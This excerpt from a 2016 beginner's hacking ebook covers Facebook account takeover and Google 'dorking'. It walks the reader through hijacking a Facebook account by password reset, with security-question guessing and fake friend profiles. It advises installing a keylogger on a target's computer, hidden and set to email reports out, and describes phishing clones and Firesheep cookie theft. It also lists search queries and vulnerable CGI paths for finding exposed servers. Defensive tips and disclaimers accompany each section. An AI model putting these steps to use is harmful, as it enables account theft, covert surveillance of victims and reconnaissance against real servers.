Securing Your Email Account
Always configure a Secondary Email Address for the recovery purpose.
Properly configure the Security Question and Answer in the Email Account.
Do Not Open Emails from strangers.
Do Not Use any other’s computer to check your Email.
Take Care of the Phishing Links.
Do not reveal your Passwords to your Friends or Mates..
...
H4CK3R : A Beginner’s Guide
2016
Page 77
17. Hack Facebook Accounts and Passwords
Facebook is easily the most popular social networking site in the entire world. Each day,
millions and millions of users log in to check their news feeds, connect with friends and
family, and even make calls. There’s just one problem. People, even those who aren’t
adept at hacking, can compromise others’ accounts by stealing their passwords. It may
sound like something out of an action film, but the honest truth is that there are
unbelievably simple methods that most people can use to gain access to someone else’s
Facebook account.
If you want to become a competent hacker, knowing methods for hacking Facebook
passwords is paramount to your learning. Now, I certainly don’t advocate using these
methods to break into other people’s personal accounts and compromise their privacy.
Not only is that illegal, it is morally wrong. If you’re reading this because you want to
get back at an ex or cause disruption, then you probably shouldn’t be reading this guide.
On a more practical note, knowing how people hack into Facebook accounts is critical if
you want to avoid being hacked. There are several things users can do to protect
themselves from the most common Facebook attacks, as we’ll discuss later.
The Password Reset
This type of attack lacks the razzle-dazzle of the more complex types of attacks, but the
fact remains that it is a simple yet effective way to commandeer another users’ Facebook
profile. In fact, this method is commonly used to hijack all sorts of different online
accounts. By changing the password, the attacker not only gains access to the profile,
but they simultaneously bar the owner of the account from accessing their profile. More
often than not, this attack is performed by a friend or acquaintance that has access to
the target’s personal computer or mobile device. You’d be surprised how many people
don’t even log out Facebook or cache their username and password in their browser
because they are lazy. The steps are as follows :
Step 1 : The first step in this attack is to determine the email address used to login to a
user’s profile. If an attacker doesn’t already know the target’s email addresses, guess
what? Most people list this information in the contact section of their Facebook profile.
Step 2 : Now all an attacker needs to do is click on the Forgotten your
password? button and enter in the assumed email address of the target. Next, an
attacker would click on the This is my account
Step 3 : Next, the password reset procedure will ask if the user wants to reset their
password via email. However, many times people will delete old email accounts and use
H4CK3R : A Beginner’s Guide
2016
Page 78
new ones. That’s why there’s a link that says No longer have access to these? Click
the link to continue.
Step 4 : The next step in the process is to update the email address linked to the
account. The prompt will ask for new contact information via the How can we reach
you? Make sure the email address you enter isn’t linked to another Facebook profile.
Step 5 : This step is a little more challenging, because it will ask a security question. If
the attacker knows the target personally, this is going to be extremely easy. However, if
the attacker doesn’t know the target very well, they can make an educated guess.
Sometimes they even dig through the victim’s Facebook profile to glean information
about possible correct answers to the security question. Once the correct answer has
been discovered, the attacker needs to wait 24 hours before they can login.
Step 6 : In the event that the attacker couldn’t guess the right answer to the security
question, there is an option to Recover your account with help from friends. The
only problem is that a lot of people ‘friend’ people on Facebook that they don’t know too
well. Select between 3 and 5 friends that will be candidates for the rest of the attack
process.
Step 7 : This part of the password reset process sends passwords to the friends. There
are two methods to this part of the process. Firstly, an attacker can contact these
individuals from the fake email address to request the new password, and bonus points
if the email address looks like the actual victim.
In addition, the attacker can create 3 to 5 fake Facebook profiles and try to ‘friend’ the
target on Facebook ahead of time. Then, all the attacker would need to do is select 3 to 5
of the bogus profiles during the procedure.
How to Prevent This Attack?
It’s frightening how easy this attack is to carry out. The good news is that there are
several things users can do to protect themselves from becoming the next victim of an
attack as follows :
Use an email address that is only dedicated to Facebook use.
Don’t list your email address on your Facebook profile.
Make your security question as complex and difficult to guess as possible. If you
really want to get tricky, you could enter a bogus answer that is unrelated to the
question (as long as you can remember it!). For example, if the security question
asks for your mother’s maiden name, you could enter
“JohnjacobjingleheimershmidtLarsson” (though there is character limit) or some
other variant that is nearly impossible to guess. Omit personal information that
is easy to guess such as pet names, birthdates, anniversaries, etc.
Using the Infamous Keylogger Method
A keylogger is a nasty piece of software because it records every single keystrokea user
types and records that information invisibly. Usernames, passwords, and payment card
H4CK3R : A Beginner’s Guide
2016
Page 79
data are all up for grabs if a hacker successfully installs a keylogger on a target’s
computer. The first type we’ll look at for hacking Facebook is a software keylogger.
The problem with software keyloggers is getting them installed on the target computing
device. This can be extremely complex if a hacker wants to do it remotely, but if an
attacker is a friend or personal acquaintance of the target, then this step becomes much
easier. There are plenty of different keyloggers out there, but you can find many of them
absolutely free of charge. After the software has been installed on the target computer,
make sure you configure the settings to make it invisible and to set an email that the
software will send the reports to.
Hardware Keyloggers
There are also hardware keyloggers in existence that look like a flash drive or wireless
USB stick. These really work best on desktop computers because they can be inserted
into the back of the computer and as they say, outta sight, outta mind. The code on the
USB stick will effectively log keystrokes, though it isn’t effective for laptops. Some of
them even look like old PS2 keyboard and mouse jacks. You can easily find one online.
How to Prevent This Attack?
Keyloggers are nasty business, but there are several things users can do to protect
themselves online as follows :
Use firewalls. Keyloggers have to send their report of logged keystrokes to
another location, and some of the more advanced software firewalls will be able
to detect suspicious activity.
Also, users should use a password database. These handy password vaults
usually have tools that automatically generate random, secure passwords. You
see, the keylogger won’t be able to see these passwords since you didn’t
technically type them. Just make sure you always copy/paste the passwords
when you log into an account.
Stay on top of software updates. Once an exploit has been found in an operating
system, the OS manufacturer will typically include patches and bug fixes in
following updates to ensure that the attack can’t be performed again.
Change passwords on a regular basis. Some users who are extremely security
conscious will change their passwords every two weeks or so. If this sounds too
tedious, you could even do it every month or every three months. It may seem
unreasonably zealous, but it will render stolen passwords useless.
Phishing
You’d be surprised how gullible the average Internet user is these days. Most people
don’t even check the URL of the site they are visiting as long as the web page looks as
they expected it to look. A lot of people have created links to bogus URLs that looks and
behaves exactly like the Facebook login page. Often times these fake links are embedded
into social media buttons on a website.
H4CK3R : A Beginner’s Guide
2016
Page 80
For example, there might be a “Share on Facebook” link, but in order to share the
content the user first needs to login to their account. The phishing attempt simply
stored the user’s credentials instead of sending them to their Facebook account. Some of
the more advanced ones store a copy of the user’s input, and then supply that
information to the actual Facebook login page. To the user, it looks as though they have
genuinely logged into Facebook, when in fact, they first visited a phishing site.
Believe it or not, it isn’t that difficult to clone a website. All an attacker needs is a fake
page and a passable URL that is extremely close to the real URL. Furthermore,
attackers can mass email these links to email lists that are purchased online and
they’re dirt cheap, too. Though it is 2016 and phishing filters are becoming increasingly
sophisticated, they’re not perfect.
How to Prevent This Attack?
There are a few simple and basic things users can do to prevent becoming the next
victim of a phishing attack as follows :
Never follow links from emails, especially those that come from sources you don’t
already know. If you think you can trust the sender, always check the URL of the
link before visiting the page. However, it’s better to visit the website directly.
Always check links on forums, websites, chatrooms, etc. Believe it or not, even
popup ads can contain bogus links to phishing sites. If it doesn’t look legit, don’t
click on it!3
Always use ant-virus and security software. Many of them include phishing
filters that will stop users from visiting phishing sites.
Stealing Cookies
Cookies are a necessary evil for some sites, but too often users lazily store their login
credentials in browser cookies without knowing any better. But an attacker doesn’t
always need access to a target’s computer to steal a cookie. There are many sniffing
techniques that can be performed across a LAN, such as the wireless network in a coffee
shop. Once the cookie has been stolen, the hacker can then load the cookie into their
browser, fooling Facebook into believing that the victim has already logged into their
account.
For example, an attacker could utilize Firesheep, which is an add-on for Firefox that
sniffs traffic on Wi-Fi networks to steal cookies and store them within the attacker’s web
browser. Once the attacker has stolen the cookie, they can login to the target’s Facebook
account, provided that the target is still logged in. Then, the attacker can change the
password of the profile. However, if the victim logs out of Facebook, the cookie will be
worthless.
Facebook Security and Attack Prevention
There are also some general techniques and best practices to avoid becoming the next
victim of a Facebook attack. Some of them should be common sense, but too many users
fail to give security a second thought.
H4CK3R : A Beginner’s Guide
2016
Page 81
Only use trusted wireless networks. If you need an Internet connection and
happen to spot an unknown SSID, it’s in your best interest to leave it alone.
Within your Facebook profile, click on Account Settings and look in the
Security Enable Secure Browsing, and make sure you always use HTTPSto
prevent cookie theft.
Always log out after you are finished browsing Facebook to prevent a cookie
attack. Too many users simply click the “X” in their tab or browser, which doesn’t
log you out.
Connect using a VPN connection. This will encrypt all of your data before
sending it to the VPN server, so local network attackers won’t be able to see what
data you’re transmitting.
Less is more. Though users are frequently tempted to share their personal
information with the world, you would do well to limit how much information you
post online. Make sure private information such as email addresses, current
location, and other similar information isn’t shared on Facebook.
Only befriend people that you trust. There are too many scams circulating that
try to build trust with a target. The only problem is you have no idea who these
strangers are, and more often than not, they’re trying to take advantage of you.
...
H4CK3R : A Beginner’s Guide
2016
Page 82
18. Google Hacking
The Google search engine found at www.google.com offers many features, including
language and document translation; web, image, newsgroups, catalog, and news
searches; and more. These features offer obvious benefits to even the most uninitiated
web surfer, but these same features offer far more nefarious possibilities to the most
malicious Internet users, including hackers, computer criminals, identity thieves, and
even terrorists. This article outlines the more harmful applications of the Google search
engine, techniques that have collectively been termed "Google Hacking." The intent of
this article is to educate web administrators and the security community in the hopes of
eventually stopping this form of information leakage.
Basic Search Techniques
Since the Google web interface is so easy to use, I won't describe the basic functionality
of the www.google.com web page. Instead, I'll focus on the various operators available :
Use the plus sign (+) to force a search for an overly common word. Use the minus
sign (-) to exclude a term from a search. No space follows these signs.
To search for a phrase, supply the phrase surrounded by double quotes (" ").
A period (.) serves as a single-character wildcard.
An asterisk (*) represents any wordnot the completion of a word, as is
traditionally used.
Google advanced operators help refine searches. Advanced operators use a syntax such
as the following:
operator:search_term
Notice that there's no space between the operator, the colon, and the search term.
The site : operator instructs Google to restrict a search to a specific web site or
domain. The web site to search must be supplied after the colon.
The filetype : operator instructs Google to search only within the text of a
particular type of file. The file type to search must be supplied after the colon.
Don't include a period before the file extension.
The link : operator instructs Google to search within hyperlinks for a search term
The cache : operator displays the version of a web page as it appeared when
Google crawled the site. The URL of the site must be supplied after the colon.
The intitle : operator instructs Google to search for a term within the title of a
document.
The inurl : operator instructs Google to search only within the URL (web
address) of a document. The search term must follow the colon.
Google Hacking Techniques
By using the basic search techniques combined with Google's advanced operators,
anyone can perform information-gathering and vulnerability-searching using Google.
This technique is commonly referred to as Google Hacking..
H4CK3R : A Beginner’s Guide
2016
Page 83
Site Mapping
To find every web page Google has crawled for a specific site, use the site: operator.
Consider the following query :
site:http://www.microsoft.com Microsoft
This query searches for the word microsoft, restricting the search to
the http://www.microsoft.comweb site. How many pages on the Microsoft web server contain
the word microsoft? According to Google, all of them! Google searches not only the
content of a page, but the title and URL as well. The word microsoft appears in the
URL of every page on http://www.microsoft.com. With a single query, an attacker gains a
rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the http://www.microsoft.com web server. In this special case, an
attacker would simply alter the query, replacing the word microsoft with the IP
address(es) of the Microsoft web server.
Finding Directory Listings
Directory listings provide a list of files and directories in a browser window instead of
the typical text-and graphics mix generally associated with web pages. These pages offer
a great environment for deep information gathering (see Figure 1).
Figure 1 : A Typical Directory Listing.
Locating directory listings with Google is fairly straightforward. Figure 1 shows that
most directory listings begin with the phrase Index of, which also shows in the title. An
obvious query to find this type of page might be intitle:index.of, which may find pages
with the term index of in the title of the document. Unfortunately, this query will return
a large number of false positives, such as pages with the following titles :
Index of Native American Resources on the Internet
LibDexWorldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
H4CK3R : A Beginner’s Guide
2016
Page 84
Judging from the titles of these documents, it's obvious that not only are these web
pages intentional, they're also not the directory listings we're looking for. Several
alternate queries provide more accurate results :
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on index.of in the
title, but on keywords often found inside directory listings, such as parent directory, name,
and size. Obviously, this search can be combined with other searches to find files of
directories located in directory listings.
Versioning : Obtaining the Web Server Software/Version
The exact version of the web server software running on a server is one piece of
information an attacker needs before launching a successful attack against that web
server. If an attacker connects directly to that web server, the HTTP (web) headers from
that server can provide this essential information. It's possible, however, to retrieve
similar information from Google's cache without ever connecting to the target server
under investigation. One method involves using the information provided in a directory
listing.
Figure 2 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but often it's legitimate, allowing an attacker to
determine what attacks may work against the server.
Figure 2 : Directory Listing Server
This example was gathered using the following query :
intitle:index.of server.at
This query focuses on the term index of in the title and server at appearing at the bottom
of the directory listing. This type of query can also be pointed at a particular web server
:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com both
run Apache web servers.
H4CK3R : A Beginner’s Guide
2016
Page 85
It's also possible to determine the version of a web server based on default pages
installed on that server.
When a web server is installed, it generally will ship with a set of default web pages,
like the Apache 1.2.6 page shown in Figure 3 :
Figure 3 : Apache Test Page.
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case, an
Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained, and by extension is insecure. By
further extension, the attacker can assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
The following table provides a brief rundown of some queries that can locate various
default pages.
Query
Intitle:Test.Page.for.Apache It.worked! this.web.site!
Intitle:Test.Page.for.Apache seeing.this.instead
Intitle:Simple.page.for.Apache Apache.Hook.Functions
Intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
intitle:welcome.to intitle:internet IIS
intitle:"Under construction" "does not currently have"
intitle:welcome.to.IIS.4.0
allintitle:Welcome to Windows NT 4.0 Option Pack
H4CK3R : A Beginner’s Guide
2016
Page 86
allintitle:Welcome to Internet Information Server
allintitle:Welcome to Windows 2000 Internet Services
allintitle:Welcome to Windows XP Server Internet
Services
allintitle:Netscape Enterprise Server Home Page
allintitle:Netscape FastTrack Server Home Page
Using Google As A CGI Scanner
To accomplish its task, a CGI scanner must know what exactly to search for on a web
server. Such scanners often utilize a data file filled with vulnerable files and directories
like the one shown below:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
Combining a list like this one with a carefully crafted Google search, Google can be used
as a CGI scanner. Each line can be broken down and used in either
an index.of or inurl search to find vulnerable targets. For example, a Google search for
this : allinurl:/random_banner/index.cgi
and returns the results shown in Figure 4.
Figure 4 : Sample Search Using A Line From A CGI Scanner.
H4CK3R : A Beginner’s Guide
2016
Page 87
A hacker can take sites returned from this Google search, apply a bit of hacker "magic,"
and eventually get the broken random_banner program to cough up any file on that web
server, including the password file, as shown in Figure 5.
Figure 5 : Password File Captured From A Vulnerable Site Found Using A Google Search.
Note that actual exploitation of a found vulnerability crosses the ethical line, and is not
considered mere web searching.
Of the many Google hacking techniques we've looked at, this technique is one of the best
candidates for automation, because the CGI scanner vulnerability files can be very
large. The gooscan tool, performs this and many other functions. Gooscan and
automation are discussed below.
Google Automated Scanning
Google frowns on automation : "You may not send automated queries of any sort to
Google's system without express permission in advance from Google. Note that 'sending
automated queries' includes, among other things :
using any software which sends queries to Google to determine how a web site or
web page 'ranks' on Google for various queries;
'meta-searching' Google; and
performing 'offline' searches on Google."
Any user running an automated Google querying tool (with the exception of tools created
with Google's extremely limited API) must obtain express permission in advance to do
so. It's unknown what the consequences of ignoring these terms of service are, but it
seems best to stay on Google's good side.
Gooscan
Gooscan is a UNIX (Linux/BSD/Mac OS X) tool that automates queries against Google
search appliances (which are not governed by the same automation restrictions as their
web-based brethren). For the security professional, gooscan serves as a front end for an
external server assessment and aids in the information-gathering phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover
what the web community may already know about a site thanks to Google's search
appliance.
H4CK3R : A Beginner’s Guide
2016
Page 88
Googledorks
The term "googledork" was coined by the author and originally meant "An inept or
foolish person as revealed by Google." After a great deal of media attention, the term
came to describe those who "troll the Internet for confidential goods." Either description
is fine, really. What matters is that the term googledork conveys the concept that
sensitive stuff is on the web, and Google can help you find it. The official googledorks
page lists many different examples of unbelievable things that have been dug up
through Google by the maintainer of the page. Each listing shows the Google search
required to find the information, along with a description of why the data found on each
page is so interesting.
GooPot
The concept of a honeypot is very straight forward. According to techtarget.com,
"A honey pot is a computer system on the Internet that is expressly set up to attract and
'trap' people who attempt to penetrate other people's computer systems."
To learn how new attacks might be conducted, the maintainers of a honeypot system
monitor, dissect, and catalog each attack, focusing on those attacks that seem unique.
An extension of the classic honeypot system, a web-based honeypot or "page pot"
(click here : http://www.gray-world.net/etc/passwd/ to see what a page pot may look like)
is designed to attract those employing the techniques outlined in this article. The
concept is fairly straightforward. Consider a simple googledork entry like this :
inurl:admin inurl:userlist
This entry could easily be replicated with a web-based honeypot by creating
an index.html page that referenced another index.html file in
an /admin/userlist directory. If a web search engine such as Google was instructed to
crawl the top-level index.html page, it would eventually find the link pointing
to /admin/userlist/index.html. This link would satisfy the Google query of inurl:admin
inurl:userlist, eventually attracting a curious Google hacker.
The referrer variable can be inspected to figure out how a web surfer found a web page
through Google. This bit of information is critical to the maintainer of a page pot system,
because it outlines the exact method the Google searcher used to locate the page pot
system. The information aids in protecting other web sites from similar queries.
GooPot, the Google honeypot system, uses enticements based on the many techniques
outlined in the googledorks collection and this document. In addition, the GooPot more
closely resembles the juicy targets that Google hackers typically go after. the
administrator of the googledorks list, utilizes the GooPot to discover new search types
and to publicize them in the form of googledorks listings, creating a self-sustaining cycle
for learning about and protecting from search engine attacks.
Although the GooPot system is currently not publicly available, expect it to be made
available early in the second quarter of 2004.
H4CK3R : A Beginner’s Guide
2016
Page 89
Protecting Yourself from Google Hackers
The following list provides some basic methods for protecting yourself from Google
Hackers :
Keep your sensitive data off the web! Even if you think you're only putting
your data on a web site temporarily, there's a good chance that you'll either
forget about it, or that a web crawler might find it. Consider more secure ways of
sharing sensitive data, such as SSH/SCP or encrypted email.
Googledork! Use the techniques outlined in this article (and the full Google
Hacker's Guide) to check your site for sensitive information or vulnerable files.
Use gooscan to scan your site for bad stuff, but first get advance express
permission from Google! Without advance express permission, Google could come
after you for violating their terms of service. The author is currently not aware of
the exact implications of such a violation. But why anger the "Goo-Gods"?!
Consider removing your site from Google's index. The Google webmasters
FAQ provides invaluable information about ways to properly protect and/or
expose your site to Google. From that page: "Please have the webmaster for the
page in question contact us with proof that he/she is indeed the webmaster. This
proof must be in the form of a root level page on the site in question, requesting
removal from Google. Once we receive the URL that corresponds with this root
level page, we will remove the offending page from our index." In some cases, you
may want to remove individual pages or snippets from Google's index. This is
also a straightforward process that can be